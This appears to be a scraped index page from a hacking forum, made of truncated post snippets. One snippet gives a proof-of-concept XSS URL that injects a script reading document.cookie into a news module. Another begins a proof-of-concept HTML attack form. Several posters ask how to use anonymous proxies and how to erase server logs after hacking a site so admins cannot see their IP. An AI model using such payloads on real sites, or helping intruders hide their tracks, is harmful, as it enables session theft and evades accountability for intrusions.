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IT Security and Insecurity Portal |
Hello !
what i have to do here ???
Proof of concept examples:
http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/sc ... |
Whats the way of using anonymous proxy?
I've heard that there is way to del the logs with your IP address |
When we hack some page... Is there any way to del all the LOGS so the admin will not see our IP ? |
Hello Guys ! I have a question !
I can't understand the way of using Anonymous proxy(HTTP) ?
When i found it what next ?
Whats the difference betwееn Wingate and proxy ?
What about she ... |
Hello guys ! I have one question !
I have Xss Bugs, but i dont know the way of using them !
) Proof-of-Concept
Create a HTML file with this lines:
<form name="mantra" method="POST" action=" ... |
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